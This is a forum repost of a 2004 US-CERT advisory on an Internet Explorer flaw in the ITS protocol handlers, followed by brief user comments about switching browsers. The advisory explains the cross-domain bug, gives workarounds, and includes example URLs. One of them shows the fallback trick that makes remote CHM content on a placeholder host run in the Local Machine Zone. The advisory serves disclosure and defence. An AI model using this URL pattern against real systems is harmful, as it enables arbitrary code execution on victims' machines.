Posted on 04/08/2004 12:56:30 PM PDT by Salo
Vulnerability Note VU#323070 Microsoft Internet Explorer does not properly validate source of CHM components referenced by ITS protocol handlers Overview Microsoft Internet Explorer (IE) does not adequately validate the source of script contained in compiled help (CHM) file components that are referenced by the Microsoft InfoTech Storage (ITS) protocol handlers. An attacker could exploit this vulnerability to execute script in different security domains. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. I. Description The Cross Domain Security Model
IE uses a cross-domain security model to maintain separation between browser frames from different sources. This model is designed to prevent code in one domain from accessing data in a different domain. The Local Machine Zone is "...an implicit zone for content that exists on the local computer. The content found on the user's computer, except for content that Internet Explorer caches on the local system, is treated with a high level of trust."
HTML Help
The Microsoft HTML Help system "...is the standard help system for the Windows platform." HTML Help components can be compiled to "...compress HTML, graphic, and other files into a relatively small compiled help (.chm) file...". The resulting compiled Help (CHM) file can then "...be distributed with a software application, or downloaded from the Web." The Help Viewer application "...uses the underlying components of Microsoft Internet Explorer to display help content. It supports HTML, ActiveX, Java, scripting languages (JScript, and Microsoft Visual Basic Scripting Edition)...".
The InfoTech Storage Format
CHM files use the Microsoft InfoTech Storage format (ITS). IE can access components within CHM files (via the IStorage interface) using several protocol handlers: ms-its, ms-itss, its, mk:@MSITStore.
For example, the following URL references an HTML file within a CHM file hosted on a remote web site:
ms-its:http://www.example.com/directory/path/compiledhelpfile.chm:/htmlfile.html
This URL references a local CHM file:
ms-its:file://c:\directory\path\compiledhelpfile.chm:/htmlfile.html
MIME Encapsulation of Aggregate HTML Documents (MHTML)
MHTML (RFC 2110) provides a way to include multiple components of an HTML document (HTML, images, script, etc.) in a single MIME email message. The ITS protocol handlers can also reference objects contained within MHTML documents:
ms-its:mhtml:file://c:\directory\path\mhtmlfile.mhtml
The ITS protocol handlers can specify an alternate location for MHTML content (URL is wrapped):
ms-its:mhtml:file://c:\file_does_not_exist.mhtml!http://www.example.com/directory/ path/compiledhelpfile.chm:/htmlfile.html
The Problem
If an ITS protocol handler is unable to access the specified MHTML file, the handler will attempt to access the content specified by the alternate location. The ITS protocol handlers incorrectly treat HTML content from one domain (htmlfile.html in example.com) as if it were in a different domain (file://, the Local Machine Zone). This is a violation of the cross-domain security model. Limited testing shows that the ms-its, its, and mk:@MSITStore protocol handlers are vulnerable.
An attacker could exploit this vulnerability using a crafted HTML document containing script or an ActiveX object or possibly an IFRAME element. Due to the way IE determines the MIME type of a file referenced by a URL, an HTML document may not necessarily have the expected file name extension (.html or .htm). Likewise, a CHM file may not have the expected .chm extension.
Functional exploit code is publicly available, and there are reports of systems being compromised via this vulnerability (Ibiza trojan).
Any program that uses the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Outlook and Outlook Express are affected. II. Impact By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. The attacker could also read or modify data in other web sites (read cookies/content, modify/create content, etc.). III. Solution There is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.
Note: Disabling Active scripting or ActiveX controls is not an effective workaround
Disabling Active scripting and ActiveX controls in any zone does not prevent the exploitation of this vulnerability. Disabling these features in the Internet and Local Machine Zones may stop some attacks.
Disable ITS protocol handlers
Disabling ITS protocol handlers may prevent exploitation of this vulnerability. Rename the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its, its, mk}
Modifying the Windows registry in this way may have unintended consequences. On Windows XP and ME, disabling the ITS protocol handlers will reduce the functionality of the Help and Support Center (HSC).
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. US-CERT maintains a partial list of antivirus vendors.
Use a different web browser
There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs. Systems Affected Vendor Status Date Updated Microsoft Corporation Vulnerable 5-Apr-2004 References
Carolyn
Wanna be Penguified? Just holla!
Got root?
Use a different web browser
There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs. Systems Affected Vendor Status Date Updated Microsoft Corporation Vulnerable 5-Apr-2004 References
Use a different web browser
In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.
Use a different web browser
Don't you mean use a different OS??
Linux, OS X, Beos, DOS, Commodore 64??
Carolyn
Linux, OS X, Beos, DOS, Commodore 64??
Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)
I might be soon though. I am very excited about Thunderbird, just needs an integrated calendar and active sync compatibility. (though my larger clients will still run Exchange/Outlook)
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.